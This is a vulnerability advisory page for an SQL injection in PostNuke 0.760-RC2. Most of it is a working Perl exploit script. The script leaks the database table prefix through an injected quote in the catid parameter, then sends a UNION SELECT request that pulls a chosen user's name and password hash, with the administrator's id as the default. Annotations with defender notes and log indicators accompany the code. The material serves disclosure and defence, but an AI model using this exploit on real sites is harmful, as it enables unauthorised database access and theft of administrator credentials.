Critical SQL Injection PostNuke 0.760-RC2=>x

2005-09-04 / 2005-09-30
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

#!/usr/bin/perl
use IO::Socket;
# Maksymilian Arciemowicz
#
# GPG http://cxsecurity.com/gpg/key.pgp
# Critical SQL INJECTION
# POSTNUKE 0.760-RC2=>x
#
#
# thx sp3x,nagash(from T-NAS),ladyBMS
# CXSecurity
#
# Purpose: proof-of-concept for an SQL injection (CWE-89) through the `catid`
# query parameter of index.php. It makes two plain-HTTP requests to port 80:
#   1. catid with a stray single quote, then scans the response for SQL error
#      text that contains the table prefix;
#   2. catid carrying a UNION SELECT against the "<prefix>users" table, then
#      scans the response for a 32-character hex string.
#
# Reviewer notes for defenders:
#   - Stage 1 depends on the application echoing database error text to the
#     client. Suppressing error output removes the prefix leak but not the
#     injection itself.
#   - catid is presumably meant to be a numeric category id (TODO confirm
#     against the PostNuke source). Validating it as an integer or binding it
#     as a query parameter addresses the root cause.
#   - Log indicators visible in this script: catid values containing a quote,
#     "UNION", "SELECT" or "/*" (spaces sent as %20), and requests that carry
#     only Host, Accept and Connection headers with no User-Agent.

# Usage banner: printed when fewer than three arguments are supplied.
if (@ARGV < 3)
{
    print "[cXIb8O3] EXPLOIT for PostNuke 0.760-RC2=>x\r\n";
    print " \r\n";
    print "perl pn-0760RC2-cXIb8O3.pl HOST /DIR/ USER_ID\r\n\r\n";
    print "HOST - Host where is postnuke example: http://localhost\r\n";
    print "DIR - Directory to PN example: /PostNuke-0.760-RC2/html/\r\n";
    print "UID - standart Admin=2\r\n\r\n";
    print "example cmd: perl pn-0760RC2-cXIb8O3.pl http://localhost /html/ 2\r\n\r\n";
    exit();
}

# Positional arguments are copied into package globals (no strict/warnings).
$HOST = $ARGV[0];
$DIR = $ARGV[1];
$UID = $ARGV[2];

print "\r\nATTACK HOST IS: ".$HOST."\r\n\r\n";

# Drops the first "http://" found in the argument. Only plain HTTP on port 80
# is spoken below.
$HOST =~ s/(http:\/\/)//;

# Stage 1 request path: a single quote in catid, expected to break the query.
$path .= $DIR;
$path .= "index.php?catid='cXIb8O3";

# "Error 404" is printed when the TCP connection fails. It is not an HTTP
# status code.
$get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST", PeerPort => "80") || die "Error 404\r\n\r\n";

print $get1 "GET $path HTTP/1.1\r\n";
print $get1 "Host: $HOST\r\n";
print $get1 "Accept: */*\r\n";
print $get1 "Connection: close\r\n\r\n";

# Read the response line by line, looking for the echoed SQL error.
while ($odp = <$get1>)
{
    # $1 is whatever sits between "ORDER BY " and "stories.pn_time" in the
    # error text. The script treats it as the database table prefix.
    if ($odp =~ /ORDER BY (.*)stories.pn_time/) {

        # Stage 2 request path: the column list is padded with repeated
        # columns and nulls, presumably to match the column count of the
        # query being extended (TODO confirm). pn_uname and pn_pass are the
        # columns read from "<prefix>users".
        $exploit .= $DIR;
        $exploit .= "index.php?catid=-99999%20UNION%20SELECT%20pn_uname,pn_uname,pn_uname,pn_uname,pn_uname,null,null,null,pn_uname,pn_uname,pn_uname,pn_uname,pn_uname,null,pn_pass,null,null,null,null,null,null%20FROM%20";
        $exploit .= $1;
        $exploit .= "users%20WHERE%20pn_uid=";
        $exploit .= $UID;
        # The trailing "/*" opens an SQL comment so the rest of the original
        # statement is ignored.
        $exploit .= "/* ";

        print "\r\nDB PREFIX IS: ".$1."\r\n\r\n";

        $get2 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST", PeerPort => "80") || die "Error 404\r\n\r\n";

        print $get2 "GET $exploit HTTP/1.1\r\n";
        print $get2 "Host: $HOST\r\n";
        print $get2 "Accept: */*\r\n";
        print $get2 "Connection: close\r\n\r\n";

        while ($odpi = <$get2>)
        {
            # Matches 32 lowercase hex characters inside a link. That is
            # consistent with an MD5 digest and presumably how pn_pass is
            # stored (TODO confirm). Stored hashes should be treated as
            # exposed if this request pattern appears in logs.
            if ($odpi =~ /0">([0-9a-f]{32})<\/a>/ ) {
                printf "Password for a user with id ".$UID." is ".$1."\r\n\r\n";
            }
        }
    }
}

